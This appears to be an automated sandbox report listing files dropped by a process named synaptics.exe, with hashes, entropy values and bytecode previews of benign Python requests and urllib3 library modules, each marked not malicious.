                                                                                                                                                                                                                Preview:o........!.fZ........................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z ..d.d.l.m!Z!m"Z"m#Z#..d.d.l$m%Z%m&Z&m'Z'..d.d.l(m)Z)m*Z*m+Z+m,Z,m-Z-m.Z...d.d.l(m.Z/..d.d.l(m0Z0..d.d.l(m.Z1..d.d.l(m2Z2..d.d.l3m4Z4..d.d.l5m6Z6..d.d.l7m8Z8..d.d.l9m:Z:m;Z;m<Z<m=Z=m>Z>m?Z?m@Z@mAZAmBZBmCZC..e6jDe6jEe6jFe6jGe6jHf.ZId.ZJd.ZKd.ZLG.d.d...d...ZMG.d.d...d...ZNG.d.d ..d eN..ZOG.d!d"..d"eMeN..ZPG.d#d$..d$..ZQd.S.)%z`.requests.models.~~~~~~~~~~~~~~~..This module contains the primary objects that power Requests.......N)...UnsupportedOperation)...DecodeError..LocationParseError..ProtocolError..ReadTimeoutError..SSLError)...RequestField)...encode_multipart_formdata)...parse_url.....)...to_native_string..unicode_is_ascii)...HTTPBasicAuth)...Callable..JSONDecodeError..Mapping..basestring..builtin_str..chardet..cookielib)...json)...urlencode..urlsplit..urlunparse)..._copy_
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):596
                                                                                                                                                                                                                Entropy (8bit):5.392829244126364
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:12:C2zQ2Z1N6EzEq+sH5MWR6hxtRHV/bCJHRi/uelmXifqI0I9IGm1yaRhCUV/X:Twnq+sHIztRERi/uAfz3pmUahCmX
                                                                                                                                                                                                                MD5:033C56A5DB17CB2374B7A49E8CF33770
                                                                                                                                                                                                                SHA1:E74FD392465928623B67D93D2C13970F411D9607
                                                                                                                                                                                                                SHA-256:853F716266FD8570978DF1E21837EA29623DC528D1C2A736BAB5F8C0D989526E
                                                                                                                                                                                                                SHA-512:3CC40F8483D238CFC8F45C2E1CE2E7B93D2DE4B6B8C667A4853A4CC702BBFDDF420B1716767058457123A5C9743548F671AFA9FF5496544F9065851B46E7BBFB
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........!.f.........................@...s....d.d.l.Z.d.d.l.m.Z...d.D.](Z.e.e...e...e.<.e.e.j...D.].Z.e.e.k.s(e...e...d.....r3e.j.e...e.j.d.e.....<.q.q.e.d.u.rke.j.Z.e.e.j...D.]+Z.e.e.k.sOe...e...d.....rje.j.e...Z.e.e.j.d.e.....<.e...e.d...Z.e.e.j.d.e.....<.qAd.S.d.S.)......N.....)...chardet)...urllib3..idna...z.requests.packages.r....)...sys..compatr......package..__import__..locals..list..modules..mod..startswith..__name__..targetZ.imported_mod..replace..r....r.....@C:\Users\user\Desktop\tmp\lib\site-packages\requests\packages.py..<module>....s(...........................................
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):19689
                                                                                                                                                                                                                Entropy (8bit):5.464587625186918
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:384:bKLx6xqoGz2kdHyVf6jLBvYANUwZaBk2bNHn8Qq:eF2GFHRjW2c/n8b
                                                                                                                                                                                                                MD5:43DF14A0CA2F72DCFEEFAAB7DE401013
                                                                                                                                                                                                                SHA1:3C401C4B47F81F19FE1D639401BA259D423F31B8
                                                                                                                                                                                                                SHA-256:96C05CD28D13ABAE70DC26DD5E72BBF2EEF65EE9C3A6CB73421B85BE0A15067C
                                                                                                                                                                                                                SHA-512:86E8D108C5B9AD910E501A93D23CD7A078A2DF4E41E770AF6456408510E9A418EAD3D2CE7E2B86A361CEF9FC2B79932F2C00A27062170750B223B18996329ED3
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........!.f.w.......................@...sj...d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l m!Z!m"Z"m#Z#m$Z$..d.d.l%m&Z&..d.d.l'm(Z(..d.d.l)m*Z*m+Z+m,Z,m-Z-m.Z.m/Z/m0Z0m1Z1m2Z2m3Z3..e.j4d.k.r.e.j5Z6n.e.j.Z6e.f.d.d...Z7e.f.d.d...Z8G.d.d...d...Z9G.d.d...d.e9..Z:d.d...Z;d.S.).z..requests.sessions.~~~~~~~~~~~~~~~~~..This module provides a Session object to manage and persist settings across.requests (cookies, auth, proxies).......N)...OrderedDict)...timedelta.....)...to_native_string)...HTTPAdapter)..._basic_auth_str)...Mapping..cookielib..urljoin..urlparse)...RequestsCookieJar..cookiejar_from_dict..extract_cookies_to_jar..merge_cookies)...ChunkedEncodingError..ContentDecodingError..InvalidSchema..TooManyRedirects)...default_hooks..dispatch_hook)...DEFAULT_REDIRECT_LIMIT..REDIRECT_STATI..PreparedRequest..Request)...codes)...CaseInsensitiveDict)...DEFAULT_P
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):4709
                                                                                                                                                                                                                Entropy (8bit):5.728659378875917
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:96:2+vEE3B8QaXQ/aMZaSUp8DuaiCSu6woOXRAdeMz2F4K1r7w:2Wn3WKfr/piTNg+eDFs
                                                                                                                                                                                                                MD5:38E02DDFE0E0FFC5B44B32F56B67F8FC
                                                                                                                                                                                                                SHA1:038E4A255F15207CF2DF62A97027FDE36B39C0F8
                                                                                                                                                                                                                SHA-256:7C423B3BA4ED65AF6CB272F56A237468CE4CC089CB9295E26CC585F8BA461873
                                                                                                                                                                                                                SHA-512:043ABD86864ABD61BABB5ED91CC597012EAC62B1B5AF64908FAA640BFEE1A8342EE47B81FCB348665CFDD91E1A398901F766E6CACE33EA3F40221DACA264FAEB
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........!.f.........................@...s....d.a.d.d.l.m.Z...i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d ..d!d"..d#d$..i.d%d&..d'd(..d)d*..d+d,..d-d...d/d0..d1d2..d3d4..d5d6..d7d8..d9d:..d;d<..d=d>..d?d@..dAdB..dCdD..dEdF....i.dGdH..dIdJ..dKdL..dMdN..dOdP..dQdR..dSdT..dUdV..dWdX..dYdZ..d[d\..d]d^..d_d`..dadb..dcdd..dedf..dgdh....i.didj..dkdl..dmdn..dodp..dqdr..dsdt..dudv..dwdx..dydz..d{d|..d}d~..d.d...d.d...d.d...d.d...d.d...d.d.....Z.e.d.d...Z.d.d...Z.e.....d.S.).a.....The ``codes`` object defines a mapping from common names for HTTP statuses.to their numerical codes, accessible either as attributes or as dictionary.items...Example::.. >>> import requests. >>> requests.codes['temporary_redirect']. 307. >>> requests.codes.teapot. 418. >>> requests.codes['\o/']. 200..Some codes have multiple names, and both upper- and lower-case versions of.the names are allowed. For example, ``codes.ok``, ``codes.OK``, and.``codes.okay
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):4403
                                                                                                                                                                                                                Entropy (8bit):5.089793546399318
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:96:GVEvJgabXXYp+hwKMGZG3h+VLTovFx0qjax7evl:GUJrbXX6wtEhL39
                                                                                                                                                                                                                MD5:EF6CE4957902D0E8832DF1F730196C1F
                                                                                                                                                                                                                SHA1:EFB2D6706F0B0C6945B5BC8E340A897BD86AEE99
                                                                                                                                                                                                                SHA-256:62FB0D2CFC30681DBC82927E191B6303298545F7CF164BB78EA1F3C9034245C7
                                                                                                                                                                                                                SHA-512:8C3FC1DC666C90E7B0BEC261EED32CE2FD856AC631725395CA4B9F18805B9651847CEEE042AF71CB6D1184599C99D9509CEE061ADE67AD0D2A05AC5F1A2C070B
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........!.f`........................@...sD...d.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z...G.d.d...d.e...Z.G.d.d...d.e...Z.d.S.).zO.requests.structures.~~~~~~~~~~~~~~~~~~~..Data structures that power Requests.......)...OrderedDict.....)...Mapping..MutableMappingc....................@...sb...e.Z.d.Z.d.Z.d.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.S.)...CaseInsensitiveDicta....A case-insensitive ``dict``-like object... Implements all methods and operations of. ``MutableMapping`` as well as dict's ``copy``. Also. provides ``lower_items``... All keys are expected to be strings. The structure remembers the. case of the last key to be set, and ``iter(instance)``,. ``keys()``, ``items()``, ``iterkeys()``, and ``iteritems()``. will contain case-sensitive keys. However, querying and contains. testing is case insensitive::.. cid = CaseInsensitiveDict(). cid['Accept'] = 'application/json'. cid['aCCEPT'] == 'application/json'
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):24591
                                                                                                                                                                                                                Entropy (8bit):5.587543517392799
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:384:NwAXYuKd5j1OCC04lbTaUGMAuAWtNNMAMFFOCTGvq2iqkg+p/cdiGjYrUcszdvLk:NW/54lPaQxA2usCTGGZcdzTR5vLk
                                                                                                                                                                                                                MD5:A32D0E9E56C6552BF8AB56BA075D705B
                                                                                                                                                                                                                SHA1:5CE7E190AF526D9E2A888D89FB2AF6EA7B5A2D77
                                                                                                                                                                                                                SHA-256:4AF84131ADD30FF8130F097CC4D0B49E8E00EB2D3BCC461BC0E15136DAB2CB93
                                                                                                                                                                                                                SHA-512:9E638C2FB89C0B58649231051C115EF7EA02901E78B74336D5A2F45B14D6AA780087E3D67C7134C6B2832B32EC91E25FDECFE1884D8456D27965C433FB82E90E
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........!.fS........................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m Z!..d.d.l.m"Z"m#Z#m$Z$m%Z%m&Z&m'Z'm(Z(..d.d.l)m*Z*..d.d.l+m,Z,m-Z-m.Z.m/Z/..d.d.l0m1Z1..d.Z2e..3..Z4d.d.d...Z5d..6e..7d.e.d.d...d.......Z8e.j9d.k.r.d.d...Z:d.d...Z"d.d...Z;d.d ..Z<dtd"d#..Z=d$d%..Z>d&d'..Z?e.j@d(d)....ZAd*d+..ZBd,d-..ZCd.d/..ZDd0d1..ZEdtd2d3..ZFd4d5..ZGd6d7..ZHd8d9..ZId:d;..ZJd<d=..ZKd>d?..ZLd@dA..ZMdBdC..ZNeOdD..ZPdEdF..ZQdGdH..ZRdIdJ..ZSdKdL..ZTdMdN..ZUdOdP..ZVe.j@dQdR....ZWdSdT..ZXdudUdV..ZYdWdX..ZZdvdYdZ..Z[dwd\d]..Z\d^d_..Z]d`da..Z^db._dc..Z`e`dd..Zae`de..Zbdfdg..Zcdhdi..Zddjdk..Zedldm..Zfdndo..Zgdpdq..Zhdrds..Zid.S.)xz..requests.utils.~~~~~~~~~~~~~~..This module provides utility functions that are used within Requests.that are also useful for external consumption.......N)...OrderedDict)...make_headers..parse_url..
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):6091
                                                                                                                                                                                                                Entropy (8bit):5.505360008763475
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:96:B/KVMbgcD9Q0jnBw/lM2oAH7KR2hSRlcLJCuhvPFor70SSD4BPa/vpy6GzbDZrH:YVIgchjjneT2CFCuh8aDiPwQRrH
                                                                                                                                                                                                                MD5:BB1FB008F51AC4575590ED955785C327
                                                                                                                                                                                                                SHA1:AB8DFDB9D746C7D6D84518F9A5393021B59CD4FA
                                                                                                                                                                                                                SHA-256:E4F9C87D335AD4A4429BAAF7A969E7A7821F52A914952D8F77937C27692457A4
                                                                                                                                                                                                                SHA-512:75FA18CC051930525D81B96DB1AB38926580A1BBBA07B81762C75B9EED2F7F5A3646EF8751596E50C513DECB86D40B6470611CF035787DCF7EC92A18C23B4F73
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........!.fC........................@...s....d.Z.d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l m!Z!..d.d.l"m#Z#..z.d.d.l$Z$W.n...e%y{......Y.n"w.e$j&.'d...s.e..(d.e$j&..d...e.j)....n.e$j*d.k.r.e%d.e$j&..d.......d.Z+d.Z,e.Z.d.Z-e...e/...0e.......e.j1f.dBd.d...Z2[.e.j3d.e.j4d d!....e.j3d"e.j5d d!....e.j6f.dCd&d'..Z7e...Z8d.d.d.d d d d.d(d.d)..dDd>d?..Z9e.j:d@k.r.d.dAl;m<Z<..e<....d.S.d.S.)Eze.Python HTTP library with thread-safe connection pooling, file post support, user friendly, and more......)...annotationsN)...NullHandler.....)...exceptions)..._TYPE_BODY)...HTTPHeaderDict)...__version__)...HTTPConnectionPool..HTTPSConnectionPool..connection_from_url)..._TYPE_FIELDS..encode_multipart_formdata)...PoolManager..ProxyManager..proxy_from_url)...BaseHTTPResponse..HTTPResponse)...make_headers)...Retry)...Timeoutz.OpenSSL zUurllib3 v2 only suppo
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):5666
                                                                                                                                                                                                                Entropy (8bit):5.116883122593759
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:96:b/rlHd/T49ElnxsGaqlYrxg5BLYrrN/jFV/5/iWb01GJwIGdP2vI5PAv/Atd2Nq:bzlHd/89El98SGrpn5/iWb01GJBvI5Px
                                                                                                                                                                                                                MD5:2744330991AED22B1699631635D58A2E
                                                                                                                                                                                                                SHA1:FD2AEFED7B1B8143C84A3F0F9F748A3DFFEB41D1
                                                                                                                                                                                                                SHA-256:B7C4439E22C8B53FE699879168E012244BA4F49EEA9CDE0AFCDD8D3F6EBEF80B
                                                                                                                                                                                                                SHA-512:48B94D7DCB7AF296790032102ABEF532AE131B0ECCBAAF5323A24670400139B159CD222E16EF74E8AD8E669432E0CA1B074A3B991E352705369FD66C41A4DD08
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........!.f.........................@...s....d.d.l.m.Z...d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...e.j.e.e.j.e.j...e.j.e...e.f...Z.G.d.d...d.e.j...Z.G.d.d...d.e.j...Z.e.j.rfd.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...G.d.d...d.e...Z.G.d.d...d.e.e...Z.d.S.d.S.)......)...annotationsN.....)..._TYPE_SOCKET_OPTIONS)..._DEFAULT_TIMEOUT.._TYPE_TIMEOUT)...Urlc....................@...s....e.Z.d.Z.U.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.S.)...ProxyConfig..ssl.SSLContext | None..ssl_context..boolZ.use_forwarding_for_https."None | str | typing.Literal[False]..assert_hostname..str | None..assert_fingerprintN....__name__..__module__..__qualname__..__annotations__..r....r.....GC:\Users\user\Desktop\tmp\lib\site-packages\urllib3\_base_connection.pyr........s..............r....c....................@...s6...e.Z.d.Z.U.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.S.)..._ResponseOptions..strZ.request_methodZ.request_urlr......preload_content..decode_content..enforce_content_lengthNr....r....r....r....r....r........s..
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):16232
                                                                                                                                                                                                                Entropy (8bit):5.256023149221024
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:384:ldFpjR4qRg8OGlm9VP0Zxfl9Zg2j142c84ll4OERj4T/gW9lYyscf:Haf8O4m9VPaxfS2Sl4ORTvNso
                                                                                                                                                                                                                MD5:98E2637F62396D7176C437B453ED9AAD
                                                                                                                                                                                                                SHA1:01E86C4955E003C891DCF0329D049037EC88EF37
                                                                                                                                                                                                                SHA-256:5DD5F42547BB8A43ECB86FACD5B56B4AF076360E5F3FA84FBA6443C2BF44C8E8
                                                                                                                                                                                                                SHA-512:D5BE672100274B33D7DD42BA809246E655127A6AFF7325CE68B1A0F4C8BE43140AC9B09672AB7C50821610EC8ED022DE58DDDFB0CCE66AB780BF2E8CD4C3DF77
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........!.f.C.......................@...s:...d.d.l.m.Z...d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...e.j.r5d.d.l.m.Z...d.d.l.m.Z...G.d.d...d.e...Z.d.d.g.Z.e...d...Z.e...d...Z.e...d...Z.e.j.d.e.j.e.e.f...e.j.e.j.e.e.f.....d.f...Z.G.d.d...d.e...Z.d.d.d...Z.G.d.d...d.e.j.e.e.f...e.j.e.e.f.....Z.G.d.d...d.e.j.e.j.e.e.f.......Z G.d.d...d.e.j.e.e.f.....Z!d.S.)......)...annotationsN)...OrderedDict)...Enum..auto)...RLock)...Protocol)...Selfc....................@...s ...e.Z.d.Z.d.d.d...Z.d.d.d...Z.d.S.)...HasGettableStringKeys..return..typing.Iterator[str]c....................C........d.S...N......selfr....r.....CC:\Users\user\Desktop\tmp\lib\site-packages\urllib3\_collections.py..keys...........z.HasGettableStringKeys.keys..key..strc....................C...r....r....r......r....r....r....r....r......__getitem__....r....z!HasGettableStringKeys.__getitem__N..r....r......r....r....r....r....)...__name__..__module__..__qualname__r....r....r....r....r....r....r........s..........r......Recentl
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):9075
                                                                                                                                                                                                                Entropy (8bit):5.250556892226646
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:192:TR6oSXCyxq9B8lhwzOcRtKtABQS0Sr6Ma/:96oe7q9H6cRTBB0Sr6Ma/
                                                                                                                                                                                                                MD5:432FA1C71B11ED7F1B671AD082D6402A
                                                                                                                                                                                                                SHA1:BD8A5383696A662605ACAB143A59185F380FCA82
                                                                                                                                                                                                                SHA-256:E83C0F2DA6088EDFB8A75743DD6F1A9CEFED9D55DEE96A2FA3AE88DEE1F3A2FB
                                                                                                                                                                                                                SHA-512:074D8864D9D47DEFC50707BF8E5E679D56D19F687EB4A09501D4F7A5C9A8FDC2E704F30F707FE3C5CFADC9F05C4C2A1FE2E46F49F5BFD57D79D4BE280B3C4163
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........!.f.&.......................@...s....d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.g.Z.e.j.e.j.e.j.e.e.j.e.e.f...f.....e.j.e.e.j.e.e.f...f...f...Z.G.d.d...d...Z.d.S.)......)...annotationsN)...urlencode.....)..._TYPE_BODY)...HTTPHeaderDict)..._TYPE_FIELDS..encode_multipart_formdata)...BaseHTTPResponse..RequestMethodsc....................@...sp...e.Z.d.Z.d.Z.h.d...Z.d%d&d.d...Z.........d'd(d.d...Z.........d)d*d.d...Z.....d+d,d!d"..Z.........d'd-d#d$..Z.d.S.).r....a..... Convenience mixin for classes who implement a :meth:`urlopen` method, such. as :class:`urllib3.HTTPConnectionPool` and. :class:`urllib3.PoolManager`... Provides behavior for making common types of HTTP request methods and. decides which type of request field encoding to use... Specifically,.. :meth:`.request_encode_url` is for sending requests whose fields are. encoded in the URL (such as GET, HEAD, DELETE)... :meth:`.request_encode_body`
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):479
                                                                                                                                                                                                                Entropy (8bit):5.327992004239093
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:6:y/2lYN5ltyLSbBjz/8Ck4w3u5r3PyNAQ9AFtHzFAGhRvsx2c6m87lE/bZAuGuFMa:C2KjR85Yr3auej47+D+0GiZ8I4srEkJ
                                                                                                                                                                                                                MD5:3B0FC8D77ED03F8F10FDC0D4BFB5FCEF
                                                                                                                                                                                                                SHA1:87648C6038D79F930F0561B1E8A38E0AC75F92FB
                                                                                                                                                                                                                SHA-256:62149554D7158B8B6B83432D4C9D911AF2E0507B6722515B95C66F20E6B07426
                                                                                                                                                                                                                SHA-512:F3C8FBE8AFD6BA68C44843A78C9CB48C43E14CFDCD46779556BD4C5984147323160BA75C416F76A8DF2CDC5389034B7CE2F69562D93231FFE62DF0783E09622D
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........!.f.........................@...sh...U.d.Z.e.r.d.d.l.m.Z.m.Z...e.e.e.e.f...d.f...Z.n.e.Z.e.e.d.<.e.e.d.<.e.e.d.<.e.e.d.<.d...Z.Z.d...Z.Z.d.S.).F.....)...Tuple..Union...version..__version__..__version_tuple__..version_tuplez.2.2.3)......r.........N)...TYPE_CHECKING..typingr....r......int..strZ.VERSION_TUPLE..object..__annotations__r....r....r....r......r....r.....?C:\Users\user\Desktop\tmp\lib\site-packages\urllib3\_version.py..<module>....s..........................
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):24008
                                                                                                                                                                                                                Entropy (8bit):5.538924468409744
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:384:D3oOv1iEkiRj91RsJ0YTnenrRaBVIT7sgTbzXugzTBDERk4VypKsFVc56AnzeuqG:D3o8rjRsJ0YTG6I8gniiJqYpn6QesG
                                                                                                                                                                                                                MD5:538643CFF85A52EA3AB03A03BC55EC50
                                                                                                                                                                                                                SHA1:BB8A81E9EA3FCB1B916410CC22F970B6076818D9
                                                                                                                                                                                                                SHA-256:4E96F9FCE28613E74764A6C72B37C91F97E434104663B16399410595F2EDC3C6
                                                                                                                                                                                                                SHA-512:13B98F4E6A89474FB79E07BC50C59B492AECF62D11E4228F942650D7CFD7358B00ADDA32ABCA1334DCBDE9A7C015CB2B1B8E9CDB9182F51F990347F6F159F542
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........!.fT........................@...s....d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...e.j.r[d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m Z ..d.d.l!m"Z"m#Z#m$Z$..d.d.l%m&Z&..d.d.l'm(Z(..z.d.d.l)Z)e)j*Z+W.n...e,e-f.y.......d.Z)G.d.d...d.e...Z+Y.n.w.d.d.l/m0Z0..d.d.l/m1Z1..d.d.l/m2Z2..d.d.l3m4Z4..d.d.l5m6Z6m7Z7m8Z8m9Z9m:Z:m;Z;..d.d.l<m=Z=m>Z>m?Z?m@Z@..d.d.lAmBZB..d.d.l.mCZD..d.d.l.mEZEmFZFmGZGmHZHmIZI..d.d.lJmKZKmLZL..d.d.lMmNZN..eOZOePZPe..QeR..ZSd.d.d ..ZTe..Ud!d"d...ZVe..Wd#..ZXeYe.d$..ZZG.d%d&..d&e...Z.G.d'd(..d(e...Z[G.d)d*..d*e.j\..Z]d+d,..d_dFdG..Z^.+d`dadNdO..Z_dbdTdU..Z`dcdVdW..ZaG.dXdY..dY..Zbe)..s[ebZ[e[Zc..ddded]d^..Zdd.S.)f.....)...annotationsN)...HTTPConnection)...HTTPException)...ResponseNotReady....timeout.........HTTPResponse)..._TYPE_PEER_CERT_RET_DICT)...SSLTransport)...HTTPHeaderDict)...probe)...assert_header_parsing)..._DEFAULT_TIMEOUT.._TYPE_TIME
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):29196
                                                                                                                                                                                                                Entropy (8bit):5.438791665772976
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:384:Gi2lt3Jti2pYtq6fBiKrzYIpKneR4TliLX1XkFCDD2rz8vIkwjYHklf8HvpnykHN:1cQ22tqUBi9eOTlfavNyke9aR
                                                                                                                                                                                                                MD5:F564D90A9B5167DB4568BCA538216282
                                                                                                                                                                                                                SHA1:3E6CC958ADCB919CED1D7EA877C8430E5F6E3068
                                                                                                                                                                                                                SHA-256:8BC1FB2AB64931CB7FDA3258A11EF61EE71EC4A50EAA38AC1C5A29162A1491CF
                                                                                                                                                                                                                SHA-512:1B3AACD4669A7CF3A7A47C2CCCB05E9293BB7D254770B36E05E561A6B0F46E0CCE073CBA8C8A8CB9A5BDDD6B52581E3111DCBA421119B4AEFC0FD811EFA9F019
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........!.f.........................@...sV...d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m Z m!Z!m"Z"m#Z#m$Z$m%Z%m&Z&m'Z'm(Z(m)Z)m*Z*m+Z+..d.d.l,m-Z-..d.d.l.m/Z/..d.d.l0m1Z1..d.d.l2m3Z3m4Z4..d.d.l5m6Z6..d.d.l7m8Z8..d.d.l9m:Z:m;Z;m<Z<..d.d.l=m>Z>m?Z?..d.d.l=m@ZA..d.d.l=mBZB..d.d.lCmDZD..e.jEr.d.d.lFZFd.d.lGmHZH..d.d.l.mIZImJZJ..e..KeL..ZMe.jNe<eOe;d.f...ZPG.d.d...d...ZQe.jRe.jSh.ZTG.d.d...d.eQe...ZUG.d.d...d.eU..ZVd6d$d%..ZWe.jXd7d*d+....Z@e.jXd8d,d+....Z@d9d-d+..Z@..d:d;d1d2..ZYd<d4d5..ZZd.S.)=.....)...annotationsN....timeout)...TracebackType.....)..._TYPE_BODY)...HTTPHeaderDict)...RequestMethods)...BaseSSLError..BrokenPipeError..DummyConnection..HTTPConnection..HTTPException..HTTPSConnection..ProxyConfig.._wrap_proxy_error)...port_by_scheme)...ClosedPoolError..EmptyPoolError..FullPoolError..HostChangedError..InsecureRequestWarning..Location
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):13219
                                                                                                                                                                                                                Entropy (8bit):4.9510831348530076
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:384:MN3d2MCSNJR3aibXrLh86mCrEl7mRkUfLL2xEZiru/cc8fditjgsS5ioCR:M1dfCSNJR3aibXrLh86frElCRvTCuUrM
                                                                                                                                                                                                                MD5:32D6E371B98501C1A5D361801FAD0583
                                                                                                                                                                                                                SHA1:5430310EA3717DB113266EC001C9DCF09B696516
                                                                                                                                                                                                                SHA-256:E67190468EBE193E15501F3572CA3005F996E1F6938BD9CED9F57556FE3B56FA
